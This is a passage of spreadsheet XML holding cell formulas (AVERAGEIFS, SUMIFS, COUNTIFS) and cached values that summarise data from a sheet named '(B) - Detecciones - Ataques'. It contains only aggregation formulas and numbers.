      <c r="CO158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>3.625</v>
      </c>
      <c r="CP158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>23</v>
      </c>
      <c r="CQ158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>9</v>
      </c>
      <c r="CY158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>2</v>
      </c>
      <c r="CZ158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH158" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.064444444</v>
      </c>
      <c r="DI158" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ158" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EX$3:$EX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.727272727</v>
      </c>
      <c r="DK158" s="271"/>
    </row>
    <row r="159">
      <c r="J159" s="277"/>
      <c r="K159" s="512"/>
      <c r="L159" s="512"/>
      <c r="M159" s="512"/>
      <c r="N159" s="512"/>
      <c r="O159" s="278"/>
      <c r="Q159" s="271"/>
      <c r="R159" s="352" t="s">
        <v>2581</v>
      </c>
      <c r="S159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>2.212459547</v>
      </c>
      <c r="T159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>21.50175439</v>
      </c>
      <c r="V159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>20.171875</v>
      </c>
      <c r="W159" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>52</v>
      </c>
      <c r="X159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>13123.47619</v>
      </c>
      <c r="Y159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>192.95</v>
      </c>
      <c r="Z159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>270987.9862</v>
      </c>
      <c r="AA159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>9.600729316</v>
      </c>
      <c r="AB159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>51.2109375</v>
      </c>
      <c r="AC159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>21.65</v>
      </c>
      <c r="AD159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>5.402794411</v>
      </c>
      <c r="AE159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>11.12</v>
      </c>
      <c r="AF159" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GN$3:$GN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>14.275</v>
      </c>
      <c r="AG159" s="271"/>
      <c r="AH159" s="352" t="s">
        <v>2581</v>
      </c>
      <c r="AI159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.02475728155</v>
      </c>
      <c r="AJ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>3</v>
      </c>
      <c r="AK159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>9.25</v>
      </c>
      <c r="AL159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>1</v>
      </c>
      <c r="AM159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>3.036842105</v>
      </c>
      <c r="AR159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>47.16666667</v>
      </c>
      <c r="AS159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>58</v>
      </c>
      <c r="AU159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>39.5</v>
      </c>
      <c r="AV159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>8</v>
      </c>
      <c r="AW159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>5.6875</v>
      </c>
      <c r="AY159" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>11.5</v>
      </c>
      <c r="BA159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>52</v>
      </c>
      <c r="BB159" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>30567</v>
      </c>
      <c r="BD159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>154</v>
      </c>
      <c r="BF159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>2.166666667</v>
      </c>
      <c r="BG159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>5</v>
      </c>
      <c r="BH159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>796</v>
      </c>
      <c r="BI159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>6</v>
      </c>
      <c r="BM159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>373639.3602</v>
      </c>
      <c r="BN159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>176546.5169</v>
      </c>
      <c r="BO159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.068627451</v>
      </c>
      <c r="BR159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>19</v>
      </c>
      <c r="BT159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>2</v>
      </c>
      <c r="BW159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>14</v>
      </c>
      <c r="BX159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>5.4375</v>
      </c>
      <c r="BZ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>2.365853659</v>
      </c>
      <c r="CA159" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC159" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>13</v>
      </c>
      <c r="CG159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>17</v>
      </c>
      <c r="CI159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>39</v>
      </c>
      <c r="CJ159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>39</v>
      </c>
      <c r="CL159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>152</v>
      </c>
      <c r="CN159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>4</v>
      </c>
      <c r="CO159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>6.125</v>
      </c>
      <c r="CP159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>70</v>
      </c>
      <c r="CQ159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>22</v>
      </c>
      <c r="CR159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.01397205589</v>
      </c>
      <c r="CU159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>9</v>
      </c>
      <c r="CW159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>18</v>
      </c>
      <c r="CY159" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GN$3:$GN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>9.5</v>
      </c>
      <c r="CZ159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB159" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC159" s="533" t="s">
